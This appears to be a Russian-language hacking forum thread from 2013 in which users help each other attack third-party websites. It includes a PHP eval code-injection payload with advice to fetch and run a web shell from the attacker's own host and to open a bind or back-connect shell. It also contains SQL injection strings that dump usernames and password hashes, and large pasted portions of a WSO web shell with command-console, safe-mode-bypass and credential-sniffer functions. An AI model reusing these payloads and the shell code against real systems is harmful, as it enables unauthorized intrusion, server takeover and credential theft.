Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!


eval(file_get_contents('шелл'));. шелл выполняется, просто прав нет или код шелл даже не исполняется? Если первое, то ищи способы поднять привилегии

GroM88
15.03.2013, 02:39
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!


Локальные файлы инклудятся?

Если можешь проинклудить файл например с папки /tmp/, то попробуй залится через phpinfo )

десять раз так получалось))

rogatiy
15.03.2013, 15:45
eval(file_get_contents('шелл'));. шелл выполняется, просто прав нет или код шелл даже не исполняется? Если первое, то ищи способы поднять привилегии


Выполняется, прав нет вообще, даже файлы вывести не может.


Локальные файлы инклудятся?
Если можешь проинклудить файл например с папки /tmp/, то попробуй залится через phpinfo )
десять раз так получалось))


В конкретном случае, который я пытаю сейчас, да, url_include работает, но давайте рассматривать вот такой расклад:

allow_url_fopen On

allow_url_include Off

Понимаю, что шелл надо бы залить, желательно в tmp, ибо там, вроде 777, но как? Можно сразу узнать готовый код? cmd=copy('сайт/шелл.тхт','shell.php'); не выполняется, а cmd=eval(file_put_contents('сайт/шелл.тхт','shell.php')); тоже, а больше функций я и не знаю Если вдруг нужны какие-то ещё данные из phpinfo - пишите.

PS: Как залить через phpinfo то?

GroM88
16.03.2013, 17:46
cmd=


Откуда ты взял это cmd?

rogatiy
16.03.2013, 21:05
В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.


Вот.

blesse
16.03.2013, 21:18
Вот.


Что вы мозги себе еб***. заливаешь на хостинг\дедик\к себе на комп если ип-белый код шелла без в формате .txt.

далее с бэкдора запускаешь=>?cmd=eval(file_get_contents('http://myhosting/fileScodomShell'a.txt')); =>PROFIT!!! всегда робит ,а там уже делай, что хочешь...если фильтры юзай char/base64_decode

rogatiy
16.03.2013, 21:32
Что вы мозги себе еб***. заливаешь на хостинг\дедик\к себе на комп если ип-белый код шелла без в формате .txt.
далее с бэкдора запускаешь=>?cmd=eval(file_get_contents('http://myhosting/fileScodomShell'a.txt')); =>PROFIT!!! всегда робит ,а там уже делай, что хочешь...если фильтры юзай char/base64_decode


Вопрос - это ты не умеешь читать, или я объяснять? Шелл выводится, работает, но прав нет. Вообще. Даже файлы не отображает.

jestkokos
17.03.2013, 04:30
Спасибо помогли в минусовом смысле....

blesse
17.03.2013, 09:58
Вопрос - это ты не умеешь читать, или я объяснять? Шелл выводится, работает, но прав нет. Вообще. Даже файлы не отображает.


Могут быть функции отключены некоторые, редко файлы не отображаются, делай биндпрот\бэкконект первой командой и будет тебе счастье.

DarkSorcerer
17.03.2013, 11:22
Имеется у нас сайт N, а на этом сайте уязвимость
/search/?name=
, пропускающая PHP-инъекции, то есть запрос
/search/?name={${phpinfo()}}
выводит phpinfo. В результате бурного гугления пришёл к такому инжекту:
name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));
.
И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!


Какой шелл пытаешься выполнять?

Попробуй этот http://rusfolder.com/35507131 файлы\директории должны выводится.

exstreme
17.03.2013, 13:21
Есть форум с XSS уязвимостью в названии темы. Что можно сделать для получения паролей, кроме как сниффером читать куки?

rogatiy
17.03.2013, 17:58
Какой шелл пытаешься выполнять?
Попробуй этот http://rusfolder.com/35507131 файлы\директории должны выводится.


WSO без пароля не выводил, загнал mobi - вывел. Куда шагать теперь? Между папками переключаться не получается, ибо шелл на сервере не сохранён.


Могут быть функции отключены некоторые, редко файлы не отображаются, делай биндпрот\бэкконект первой командой и будет тебе счастье.


Не работает вроде, во всяком случае биндпорт.

PS: Ребят, огромное спасибо за помощь, на RDot'e послали лесом, причём не кто-то, а модератор.

DarkSorcerer
17.03.2013, 18:27
WSO без пароля не выводил, загнал mobi - вывел. Куда шагать теперь? Между папками переключаться не получается, ибо шелл на сервере не сохранён.
Не работает вроде, во всяком случае биндпорт.
PS: Ребят, огромное спасибо за помощь, на RDot'e послали лесом, причём не кто-то, а модератор.


Ищи директорию с правами на запись, хотя возможно там даже есть запись во всех директориях. Ты можешь ходить по каталогам из шелла что я тебе дал, используй GET запросы, копируй ссылку "на уровень вверх" например и подставляй переменную с параметрами из этой ссылки в адресной строке.

zloy_fantom
18.03.2013, 19:32
Может немного не в тему, но все-же:

Есть рабочий site.com.ua

И есть файлы, доступные для скачивания по адресам p.site.com.ua/[имя файла] и l.site.com.ua/[имя файла], на которые никакого намека в конфигах не нашел. Сам сайт расположен в opt/www/public/index.php причем на нем есть раскрытие путей (так и раскрыл конфиги), как такое может быть сделано и как это можно использовать? Спасибо

Sat-hacker
20.03.2013, 17:36
Иногда попадаються шелы на которых много доменов но они подписаны не как название сайта site.ru а наприме hzhzhzhz как узнать какой это домен если он не прописан не в robots.txt и т.д,есть ли какой-то скрипт который отправляет инфу о домене например на мыло?Спасибо.

qaz
20.03.2013, 18:05
Иногда попадаються шелы на которых много доменов но они подписаны не как название сайта site.ru а наприме hzhzhzhz как узнать какой это домен если он не прописан не в robots.txt и т.д,есть ли какой-то скрипт который отправляет инфу о домене например на мыло?Спасибо.


какое мыло? ты чё? смской тебе не прислать?))

если не можешь найти логи то ставь в индексы и жди результата








Вопрос насчет search.php SQLi в булке 4.1.2;
Добавляю к запросу &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
Вместо того чтобы выводить данные, выводит слово: Uncategorized
Кто, что знает насчет этого?


тут и логично можно понять что дыру пропатчили


Может немного не в тему, но все-же:
Есть рабочий site.com.ua
И есть файлы, доступные для скачивания по адресам p.site.com.ua/[имя файла] и l.site.com.ua/[имя файла], на которые никакого намека в конфигах не нашел. Сам сайт расположен в opt/www/public/index.php причем на нем есть раскрытие путей (так и раскрыл конфиги), как такое может быть сделано и как это можно использовать? Спасибо


никак

Sat-hacker
20.03.2013, 18:09
qaz а чего ждать?

А смской было бы не плохо

qaz
20.03.2013, 18:41
qaz
а чего ждать?


пока кто нибуть не зайдёт на сайт, как кто-то зайдёт домен запишется в log.txt

rogatiy
20.03.2013, 22:19
Ищи директорию с правами на запись, хотя возможно там даже есть запись во всех директориях. Ты можешь ходить по каталогам из шелла что я тебе дал, используй GET запросы, копируй ссылку "на уровень вверх" например и подставляй переменную с параметрами из этой ссылки в адресной строке.


Выход был настолько прост, что я его и не заметил (с)

Благодарю! Добра тебе, милейший.

Господа, новая задача:


PHP 5.2.6-1+LENNY16
allow_url_fopen On
allow_url_include Off
file_uploads On
magic_quotes_gpc On
magic_quotes_runtime Off
magic_quotes_sybase Off
cURL On

Дыра всё та же - PHP inj в URL. /search?name={${eval(stripslashes($_GET[cmd]))}}&cmd=phpinfo(); не пашет, name={${eval(stripslahes(file_get_contents($_COOKI E[shell])))}}, где содержание печеньки "shell" = 'линк на шелл', тоже, точнее срабатывают MQ, кавычки экранируются и запрос ломается. Идеи?

Sanic1977
20.03.2013, 22:52
Есть вопрос?

Вопрос такого плана:

на acunetix можно реализовать sql инъекцию такого вида:

?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1

ответ: syntax error: ':5.5.9-log'

ставлю в браузер, инъекции не видно.

Есть подозрения что кавычки не передаются должным образом или срабатывает защита

Как быть?

rogatiy
20.03.2013, 22:59
Вопрос такого плана:
на acunetix можно реализовать sql инъекцию такого вида:
?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
ответ: syntax error: ':5.5.9-log'
ставлю в браузер, инъекции не видно.
Есть подозрения что кавычки не передаются должным образом
Как быть?


// Не верь мне, я - типичный скрипткидди.

Есть вероятность, что вся уязвимость построена на этой ошибке? 5.5.9, судя по всему, как раз таки и является версией MySQL. Попробуй database(), тогда уж и будет видно.

Либо просто включены magicquotes и, как я люблю писать, выход был настолько прост, что я его и не заметил (с)

Sanic1977
20.03.2013, 23:11
// Не верь мне, я - типичный скрипткидди.
Есть вероятность, что вся уязвимость построена на этой ошибке? 5.5.9, судя по всему, как раз таки и является версией MySQL. Попробуй database(), тогда уж и будет видно.
Либо просто включены magicquotes и, как я люблю писать,
выход был настолько прост, что я его и не заметил
(с)


?id=1'"or(ExtractValue(1,concat(0x3a,database())))="1

пишет Column 'url' cannot be null

в браузере ошибок не видно

rogatiy
20.03.2013, 23:16
?id=1'"or(ExtractValue(1,concat(0x3a,database())))="1
пишет Column 'url' cannot be null
в браузере ошибок не видно


Тогда не представляю, это же Blind SQLi, что геморройно, во всяком случае для креветки-меня. А зачем двойные кавычки в запросе?

И вот ещё (https://antichat.live/showpost.php/p/2673441/postcount/168/), покури.

Sanic1977
20.03.2013, 23:22
Тогда не представляю, это же Blind SQLi, что геморройно, во всяком случае для креветки-меня. А зачем двойные кавычки в запросе?


только с двойными кавычками выводится инфа

на acunetix выодится ошибка, а firefox нет

смотрел через прокси что идет,там

acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1

firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221

может в этом?

из-за этого не могу автоматизировать

rogatiy
21.03.2013, 00:11
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать


Нет, %27, например, это ' в HTML и т.д.

Не в этом дело

Sanic1977
21.03.2013, 00:16
Нет, %27, например, это ' в HTML и т.д.
Не в этом дело


там знак ' не играет роли без него можно обойтись просто стоит, инъекция через кавычки "

zloy_fantom
21.03.2013, 00:42
никак


Спасибо, хоть и жаль, есть еще идея:

Как я уже говорил, есть раскрытие путей и могу читать файлы.

Вот часть запроса в одном из скриптов:


sql_query("SELECT id, pass, FROM users

В одном из скриптов есть строка:


$sql_name = "all";

Файл my.cnf содержит настройки:


basedir = /usr
datadir = /var/lib/mysql

Из чего делаю вывод, что в папке /var/lib/mysql/all лежит файл базы данных с именем users и неизвестным мне расширением, однако просмотр файлов, которым я располагаю, этот файл не показывает. Пробовал без расширения и с расширениями MYI, MYD, frm. Что еще можно попробовать? Может путь неверно указал???

Спасибо

ерёма
21.03.2013, 12:20
недавно мне на сайт залили шелл. я его скачал и нашёл в нём левую бд,тоесть вырезку из конфига пароль пользователь базы и путь к ней. я спокойно зашёл в бд далее создал второго админа после чего заглянул в админку сайта.к слову сказать сайт серьёзный с хорошими пузомерками и в индексе море страниц.в связи с этим у меня два вопроса. что за шелл такой мне залили?почему в нём оказалась бд сайта? и что собственно теперь с эти сайтом делать?

BigBear
21.03.2013, 14:29
только с двойными кавычками выводится инфа
на acunetix выодится ошибка, а firefox нет
смотрел через прокси что идет,там
acunetix -> ?id=1'"or(ExtractValue(1,concat(0x3a,version())))="1
firefox -> ?id=1%27%22or(ExtractValue(1,concat(0x3a,user()))) =%221
может в этом?
из-за этого не могу автоматизировать


Скорее всего проблема в редиректе.

В акунетиксе он отключен по умолчанию.

qaz
21.03.2013, 20:12
Из чего делаю вывод, что в папке /var/lib/mysql/all лежит файл базы данных с именем users


ничего там не лежит


недавно мне на сайт залили шелл. я его скачал и нашёл в нём левую бд,тоесть вырезку из конфига пароль пользователь базы и путь к ней. я спокойно зашёл в бд далее создал второго админа после чего заглянул в админку сайта.к слову сказать сайт серьёзный с хорошими пузомерками и в индексе море страниц.в связи с этим у меня два вопроса. что за шелл такой мне залили?почему в нём оказалась бд сайта? и что собственно теперь с эти сайтом делать?



чёза бред ты тут сказал? может это вовсе не шелл,

zloy_fantom
21.03.2013, 21:38
ничего там не лежит


А где лежит? В чем ошибка рассуждений? какой информации не хватает для определения того, в какой папке на сервере расположены таблицы базы данных?

Спасибо

ерёма
21.03.2013, 21:43
чёза бред ты тут сказал? может это вовсе не шелл,


вот кусок из шелла в конце база


function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); echo "document.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "document.mf.c.value='".$GLOBALS['cwd']."';"; } } echo "document.cf.output.value+='".$temp."';"; echo "document.cf.output.scrollTop = document.cf.outpu t.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } printHeader(); ?> if(window.Event) window.captureEvents(Event.K EYDOWN); var cmds = new Array(""); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur Console'; foreach($GLOBALS['aliases'] as$n=>$v) { if($v=='') { echo''; continue; } echo ''.$n.''; } if(empty($_POST['ajax'])&&!empty($_POST['p1']))$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] =false; echo'>"> send using AJAX
'; if(!empty($_POST['p1'])) { echohtmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo''; echo'document.cf.cmd.focus();';pr intFooter(); } functionactionLogout() { unset( $_SESSION[md5($_SERVER['HTTP_HOST'])]); echo'bye!'; } functionactionSelfRemove() {p rintHeader(); if($_POST['p1'] =='yes') { if(@unlink(SELF_PATH)) die('Shell has been removed'); else echo'unlink error!' ; } echo'SuicideReally want to remove the s hell?
Yes';printFooter(); } functionactionSniffer() { printHeader(); echo'Sniffer';$host='сдесь омер заказа.mysql.ihc.ru';$db='сам база_db';$user='сдесь прописа пользователь_db';$passwd='ну и пароль';$link=mysql_connect($host,$user,$pa sswd);mysql_select_db($db,$link);$result=mysql_que ry("SELECT * FROM jos_phocadownload_templates");$n=mysql_num_rows($result); echo""; for($i=0;$i".' Login:',mysql_result($result,$i,login),"".'Pass:',mysql_result($result,$i,pass),"".'IP:',mysql_result($result,$i,ip),"".'Date:',mysql_result($result,$i,date),"".'id:',mysql_result($result,$i,id),"".'referer:',mysql_result($result,$i,ref),""; echo""; echo"";mysql_close($link);printFooter(); }

ерёма
21.03.2013, 21:48
?>

function sa() {

for(i=0;i

NameSizeModifyOwner/GroupPermissionsActions";

$dirs = $files = $links = array();

$n = count($dirContent);

for($i=0;$i $dirContent[$i],

'path' => $GLOBALS['cwd'].$dirContent[$i],

'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),

'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),

'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),

'owner' => $ow['name']?$ow['name']fileowner($dirContent[$i]),

'group' => $gr['name']?$gr['name']filegroup($dirContent[$i])

);

if(@is_file($GLOBALS['cwd'].$dirContent[$i]))

$files[] = array_merge($tmp, array('type' => 'file'));

elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))

$links[] = array_merge($tmp, array('type' => 'link'));

elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))

$dirs[] = array_merge($tmp, array('type' => 'dir'));

}

$GLOBALS['sort'] = $sort;

function cmp($a, $b) {

if($GLOBALS['sort'][0] != 'size')

return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);

else

return (($a['size'] '.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms']

.'R T'.(($f['type']=='file')?' E D':'').'';

$l = $l?0:1;

}

?>





'>

'>

CopyMoveDeletePaste >">



String conversions';

$stringTools = array(

'Base64 encode' => 'base64_encode',

'Base64 decode' => 'base64_decode',

'Url encode' => 'urlencode',

'Url decode' => 'urldecode',

'Full urlencode' => 'full_urlencode',

'md5 hash' => 'md5',

'sha1 hash' => 'sha1',

'crypt' => 'crypt',

'CRC32' => 'crc32',

'ASCII to HEX' => 'ascii2hex',

'HEX to ASCII' => 'hex2ascii',

'HEX to DEC' => 'hexdec',

'HEX to BIN' => 'hex2bin',

'DEC to HEX' => 'dechex',

'DEC to BIN' => 'decbin',

'BIN to HEX' => 'bin2hex',

'BIN to DEC' => 'bindec',

'String to lower case' => 'strtolower',

'String to upper case' => 'strtoupper',

'Htmlspecialchars' => 'htmlspecialchars',

'String length' => 'strlen',

);

if(empty($_POST['ajax'])&&!empty($_POST['p1']))

$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

echo "";

foreach($stringTools as $k => $v)

echo "".$k."";

echo ">'/> send using AJAX
".htmlspecialchars(@$_POST['p2'])."";

if(!empty($_POST['p1'])) {

if(function_exists($_POST['p1']))

echo htmlspecialchars($_POST['p1']($_POST['p2']));

}

echo"";

?>


Search for hash:



















File tools';

if( !file_exists(@$_POST['p1']) ) {

echo 'File not exists';

printFooter();

return;

}

$uid = @posix_getpwuid(@fileowner($_POST['p1']));

$gid = @posix_getgrgid(@fileowner($_POST['p1']));

echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';

echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

';

if( empty($_POST['p2']) )

$_POST['p2'] = 'view';

if( is_file($_POST['p1']) )

$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');

else

$m = array('Chmod', 'Rename', 'Touch');

foreach($m as $v)

echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';

echo '

';

switch($_POST['p2']) {

case 'view':

echo '';

$fp = @fopen($_POST['p1'], 'r');

if($fp) {

while( !@feof($fp) )

echo htmlspecialchars(@fread($fp, 1024));

@fclose($fp);

}

echo '';

break;

case 'highlight':

if( is_readable($_POST['p1']) ) {

echo '';

$code = highlight_file($_POST['p1'],true);

echo str_replace(array(''), array(''),$code).'';

}

break;

case 'chmod':

if( !empty($_POST['p3']) ) {

$perms = 0;

for($i=strlen($_POST['p3'])-1;$i>=0;--$i)

$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));

if(!@chmod($_POST['p1'], $perms))

echo 'Can\'t set permissions!
document.mf.p3.value="";';

else

die('g(null,null,null,null,"")');

}

echo '>">';

break;

case 'edit':

if( !is_writable($_POST['p1'])) {

echo 'File isn\'t writeable';

break;

}

if( !empty($_POST['p3']) ) {

@file_put_contents($_POST['p1'],$_POST['p3']);

echo 'Saved!
document.mf.p3.value="";';

}

echo '';

$fp = @fopen($_POST['p1'], 'r');

if($fp) {

while( !@feof($fp) )

echo htmlspecialchars(@fread($fp, 1024));

@fclose($fp);

}

echo '>">';

break;

case 'hexdump':

$c = @file_get_contents($_POST['p1']);

$n = 0;

$h = array('00000000
','','');

$len = strlen($c);

for ($i=0; $i'.$h[0].''.$h[1].''.htmlspecialchars($h[2]).'';

break;

case 'rename':

if( !empty($_POST['p3']) ) {

if(!@rename($_POST['p1'], $_POST['p3']))

echo 'Can\'t rename!
document.mf.p3.value="";';

else

die('g(null,null,"'.urlencode($_POST['p3']).'",null,"")');

}

echo '>">';

break;

case 'touch':

if( !empty($_POST['p3']) ) {

$time = strtotime($_POST['p3']);

if($time) {

if(@touch($_POST['p1'],$time,$time))

die('g(null,null,null,null,"")');

else {

echo 'Fail!document.mf.p3.value="";';

}

} else echo 'Bad time format!document.mf.p3.value="";';

}

echo '>">';

break;

case 'mkfile':

break;

}

echo '';

printFooter();

}

function actionSafeMode() {

$temp='';

ob_start();

switch($_POST['p1']) {

case 1:

$temp=@tempnam($test, 'cx');

if(@copy("compress.zlib://".$_POST['p2'], $temp)){

echo @file_get_contents($temp);

unlink($temp);

} else

echo 'Sorry... Can\'t open file';

break;

case 2:

$files = glob($_POST['p2'].'*');

if( is_array($files) )

foreach ($files as $filename)

echo $filename."\n";

break;

case 3:

$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);

curl_exec($ch);

break;

case 4:

ini_restore("safe_mode");

ini_restore("open_basedir");

include($_POST['p2']);

break;

case 5:

for(;$_POST['p2'] Safe mode bypass';

echo 'Copy (read file)>">
Glob (list dir)>">
Curl (read file)>">
Ini_restore (read file)>">
Posix_getpwuid ("Read" /etc/passwd)FromTo>">

Imap_open (read file)>">';

if($temp)

echo ''.$temp.'';

echo '';

printFooter();

}

function actionConsole() {

if(isset($_POST['ajax'])) {

$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;

ob_start();

echo "document.cf.cmd.value='';\n";

$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));

if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {

if(@chdir($match[1])) {

$GLOBALS['cwd'] = @getcwd();

echo "document.mf.c.value='".$GLOBALS['cwd']."';";

}

}

echo "document.cf.output.value+='".$temp."';";

echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";

$temp = ob_get_clean();

echo strlen($temp), "\n", $temp;

exit;

}

printHeader();

?>

if(window.Event) window.captureEvents(Event.KEYDOWN);

var cmds = new Array("");

var cur = 0;

function kp(e) {

var n = (window.Event) ? e.which : e.keyCode;

if(n == 38) {

cur--;

if(cur>=0)

document.cf.cmd.value = cmds[cur];

else

cur++;

} else if(n == 40) {

cur++;

if(cur

Console';

foreach($GLOBALS['aliases'] as $n => $v) {

if($v == '') {

echo '';

continue;

}

echo ''.$n.'';

}

if(empty($_POST['ajax'])&&!empty($_POST['p1']))

$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

echo '>"> send using AJAX
';

if(!empty($_POST['p1'])) {

echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));

}

echo '';

echo 'document.cf.cmd.focus();';

printFooter();

}

function actionLogout() {

unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);

echo 'bye!';

}

function actionSelfRemove() {

printHeader();

if($_POST['p1'] == 'yes') {

if(@unlink(SELF_PATH))

die('Shell has been removed');

else

echo 'unlink error!';

}

echo 'SuicideReally want to remove the shell?
Yes';

printFooter();

}

function actionSniffer() {

printHeader();

echo 'Sniffer';

$host='сдесь номер заказа.mysql.ihc.ru';

$db='сама база_db';

$user='сдесь прописан пользователь_db';

$passwd='ну и пароль';

$link = mysql_connect($host, $user, $passwd);

mysql_select_db($db, $link);

$result=mysql_query("SELECT * FROM jos_phocadownload_templates");

$n=mysql_num_rows($result);

echo "";

for($i=0;$i".' Login:',mysql_result($result,$i,login),"".'Pass:',mysql_result($result,$i,pass),"".'IP:',mysql_result($result,$i,ip),"".'Date:',mysql_result($result,$i,date),"".'id:',mysql_result($result,$i,id),"".'referer:',mysql_result($result,$i,ref),"";

echo "";

echo "";

mysql_close($link);

printFooter();

}[/I][/I]

qaz
21.03.2013, 21:56
А где лежит? В чем ошибка рассуждений? какой информации не хватает для определения того, в какой папке на сервере расположены таблицы базы данных?
Спасибо


они в БД лежат а не в папке

ерёма
21.03.2013, 22:02
полная версия

qaz
21.03.2013, 22:55
http://rghost.ru/44661788 полная версия


собственно нафига ты это всё сюда павыкладывал?? ты спрашивал что с найденыйм сайтом делать? - ответ что хочешь то делай, к данной теме это не имеет никакого отношения

ерёма
21.03.2013, 23:14
собственно нафига ты это всё сюда павыкладывал?? ты спрашивал что с найденыйм сайтом делать? - ответ что хочешь то делай, к данной теме это не имеет никакого отношения


Извиняюсь конечно что не в тот топик начал писать. Просто с мобилки изначально юзал форум и не очень удобно было искать подходящую тему.Вот и написал сюда, мне показалось что этот топик более подходит.С сайтом мне понятно что делать. Просто я с шелами особо не сталкивался вот по этому и попросил разьяснить по чему в нём оказалась бд, для чего она там?И вообще это часто встречается что в шелл вписывают бд других сайтов? И шелл ли это???